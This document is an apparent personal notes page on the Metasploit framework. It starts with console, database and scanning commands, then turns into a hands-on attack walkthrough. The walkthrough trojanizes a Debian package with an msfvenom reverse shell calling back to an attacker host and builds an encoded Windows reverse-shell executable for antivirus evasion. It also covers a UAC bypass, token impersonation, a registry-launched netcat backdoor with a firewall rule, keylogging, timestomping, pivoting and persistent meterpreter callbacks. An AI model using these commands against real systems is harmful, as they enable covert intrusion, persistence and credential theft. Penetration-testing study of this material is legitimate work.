Data is in /usr/share/metasploit-framework modules: exploits: for known vulnerabilities payloads: the code that is delivered to the compromised system post: post exploitation operations nops: data to pad the payload (depends on interpreter/architecture) encoders: generate payload in a way trying to decept the antivirus evasion: auxiliary: plugins: extensions to the msf lib: ruby libraries supporting the framowork
To save information in a local database connected to msf
To get the list of available commands.
Comands are divided in sections. E.g. Database
To get database status
Search for an exploit or payload. E.g. search for reverse tcp
> search reverse_tcp
Load a plugin
Interact with a module by name.
> use windows/shell/reverse_tcp
One particular module (e.g. exploit) can have "options". To list options:
> show options
To set a particular option. E.g.
> set LHOST 127.0.0.1
To unset a particular option. E.g.
> set LHOST
Back to the global dispatcher context. E.g. undo the use directive. (Looks like altered options remain setted)
Set global option (setg alias of set -g) This implicitly also set the module specific options with the same name.
> setg LHOST 127.0.0.1
To unset a global setting
> unsetg LHOST
Once selected a particular module we can see the payloads usable with that module. E.g.
> use windows/fileformat/ms09_067_excel_featheader
A payload is a single module is something that works alone. A stager is a module is trying to stage a connection between msf and the victim machine. Makes the connection Stages are the pieces of the payload that are downloaded by the stager.
Select a payload
> use payload/windows/shell_bind_tcp
Generate a shellcode using the
> help generate
We can filter out some bytes from the payload using the
For example to get rid of the characters 0x7c and 0x0a':
> generate -b '\x7c\x0a'
We can use several encoders
> show encoders
By default msf selects the best encoder for the job. If we decide to avoid some characters other encoders may be used. To explicitly use an encoder:
> generate -e x86/add_sub
To save to a file
> generate -f <filename>
Number of encoding iterations. Mostly for anti virus evasion. The output payload will be bigger as well.
> generate -i 3
The payload is generated using the parameters that can be viewed with the
options command. We can set the options to be used "on the fly" by using
> generate -o LPORT=1234,EXITFUNC=seh
The payload EXITFUNC option is used to set the way the payload shall exit. In short specifies the function to call when the payload is complete
Without options, generates the payload in "ruby". We can let msf generate the payload for different languages. E.g. in C language:
> generate -f c
List or switch workspaces
Add a new workspace
> workspace -a <name>
Import a scan result file (e.g. Nessus)
List all services in the database (e.g. running on port 21 and show only port and proto columns
> services -p 21 -c port,proto
List all hosts in the database
Console started when the exploit is in progress.
Once that an exploit has been selected with the
use command, we can start
an exploitation attempt (
Put a session in background and return to is later
To show all the active sessions
We can start a command shell (we can terminate it using
There is a bounch of commands available, e.g. to download a file to local machine.
> download <filename>
To execute a "Post" module
> run <postmodule>
> run post/linux/gather/hashdump
The database is automatically updated with the vulns, etc.
To cleanup all the informations bound to a given host
> hosts -d <ip>
To exit from the meteinterpreter
Vulnerability scanning -> Nessus Port scanning -> nmap
Banner grabbing: deduce the service application/version using the info sent spontaneously by the app during the connection.
NMap can be run directly from metasploit. E.g. to get OS information, services details, traceroute and other useful stuff:
> nmap -A <ip>
It doesn't automatically update the database. To update the database with the results:
> db_nmap -A <ip>
Now we can take a look at the infos in the db: hosts, services, vulns, etc.
The other portscanners:
> search portscan
Use one of the "built-in" scanners. E.g. the TCP portscan
> use auxiliary/scanner/portscan/tcp
And then start the scan using the
There are other type of service specific scanners
> search scanner
To use the samba version scanner
> use auxiliary/scanner/smb/smb_version > run
Web application vulnerability scanner. Load WMAP module.
> load wmap
help command reports the wmap commands as well.
To add a site
> wmap_sites -a http://<host>
To add a target (root folder)
> wmap_targets -t http://<host>/
List the modules that will be used to scan the remote system.
> wmap_run -t
Run the WMAP scan against our target URL.
> wmap_run -e
See if WMAP found anything of interest.
> wmap_vulns -l
Load Nessus module.
> load nessus
Connect to the nessus server
> nessus_connect username:password@hostname:port <ssl_verify/ssl_ignore>
From the web application we run a scan. We can export the found results in "binary" nessus format.
We can import then the scan from metasploit
> db_import <file>
As an example, the xbomb package is modified "by hand" to contain a malicious executable file.
$ dbpg -x package.deb
Beside the files that are supposed to go to the target filesystem there are some "control"
files that are used by
dpkg to control the installation process"
DEBIAN/control : package information DEBIAN/postinst : post installation actions
MSFVenom: metasploit standalone payload generator.
The payload opens a remote shell to the attacker machine (LHOST) on the specified port (LPORT).
$ msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.0.3 LPORT=443 -b "\x00" -f elf -o /root/backdoor/workdir/usr/games/xbomb_scores
The payload becomes part of the package. When the victim installs it... The package shalle be rebuilt
$ dpkg-deb --build /root/backdoor/workdir/
Now I need to put something listening on port 443 on the attacker machines.
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/shell/reverse_tcp; set LHOST 192.168.0.3; set LPORT 443; run; exit -y" -q : quiet (do not print banner at startup) -x : execute the specified string as console commands exit -y to exit without prompting for confirmation
The PAYLOAD shall match the one used to create the payload via
Note that the same can be done interactivelly by launching the
msfconsole and typing the above commands.
When the victim installs the malicious package it will connect to the attacker machine that will get a root shell under the msfconsole process.
Use MSFVenom to create the payload for the victim machine
$ msfvenom -p windows/meterpreter/reverse_tcp -b "\x00" LHOST=192.168.0.3 LPORT=4444 -i 5 -f exe -o win-rev-shell.exe -i : iterations for the encoder
Use MSFConsole to create the handler
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.3; set LPORT 4444; run; exit -y"
Once the victim fires the
win-rev-shell.exe our interpreter is bound to that program process.
If the user closes the process our connection dies.
We can avoid this by migrating our connection to another process:
meterpreter> run post/windows/manage/migrate
Simplified interface to run commands on the target machine once already compromised.
meterpreter> getuid meterpreter> ps
To put the
meterpreter in background
I can then search for other exploits to be executed locally
meterpreter> search exploit/windows/local
To list the active meterpreter sessions:
msf > sessions
To connect to a particular session
msf > sessions -i #session-id
To get a screenshot of the desktop
To bypass the "User Account Control" from metasploit.
msf> search bypassuac ... msf> use exploit/windows/local/bypassuac
In the options I have to use the meterpreter session where I want to run the exploit
msf> set session #session-id
(Due to a probable bug the first run goes in timeout)
After timeout I get some more options to set....
msf> set LHOST <attacker-ip> msf> set LPORT <attacker-port> msf> run
I get another meterpreter session with admin privileges.
Get password hashes.
Once we have a system administrator account.
This leaves in the "Computer Management->Event Viewer->Windows Logs" the event: "LOG Clear" which is a bit suspicious anyway.
Tool to assume different identities under the compromised system without using password hashes for a dictionary attack or rainbow tables. Used to be a standalone project. Now is integrated in metasploit framework.
meterpreter> use incognito meterpreter> list_tokens -[u|g] (users or groups)
"Delegate" token let you run interactive commands (e.g. a shell).
meterpreter> impersonate_token IE8Win7\IEUser meterpreter> shell (to spawn a command shell)
Persistent backdoor. Setup a listener on a port of choice.
Upload netcat to the compromised system
meterpreter> upload /usr/share/windows_binaries/nc.exe C:\\windows\\system32
Edit the register key to let the system run netcat at every boot
meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Add rule to windows firewall (first we shall enter a command shell)
meterpreter> shell C:\> netsh advfirewall firewall add rule name='netcat' protocol=tcp localport=445 dir=in action=allow protgram='c:\windows\system32\nc.exe'
Once reboot there shall be netcat listening on the specified port. From the Kali machine, to get the windows remote command prompt:
$ nc -v <ip> <port>
Once the system is compromised I may like to access it via RDP. Add a new user with a new password.
meterpreter> run getgui -u victim -p password
On a kali shell start an rdp session to the victim machine.
$ rdesktop -v victim -p password <victimip>
After logout remember to run the cleanup script (as suggested by getgui).
We can run a sniffer and redirect information to the meterpreter shell.
meterpreter> use sniffer meterpreter> sniffer_interfaces (show available interfaces) meterpreter> sniffer_start <n> (n is the interface I want to sniff) meterpreter> sniffer_dump <n> /root/Desktop/snif.cap (download capture to kali) meterpreter> sniffer_stop <n>
On kali i can then read the pcap using wireshark.
Use the victim machine as a gateway to connect to other systems not accessible directly.
meterpreter> portfwd add -l <locport> 445 -p <remport> -r <remip> meterpreter> portwd list (to list active forward rules)
Similar to ssh tunnelling.
To modify timestamp attributes. To set the attributes equal to the supplied file (e.g. desktop.ini)
meterpreter> timestamp tools.exe -f desktop.ini
To search for files within the compromised system.
meterpreter> keyscan_start meterpreter> keyscan_dump meterpreter> keyscan_stop
Install meterpreter persistent backdoor.
meterpreter> run persistence -U -i 5s -p <port> -r <ip> -U automatically when user logs on -i <opt> interval in seconds between each connection attempt -p <opt> remote port (attacker port) -r <opt> remote address (attacker address)
Now I reboot the windows machine to start the service. From Kali, run the handler
msf> use exploit/multi/handler msf> run
After ~5s the windows machine should connect to us.
proudly self-hosted on a cheap Raspberry Pi 2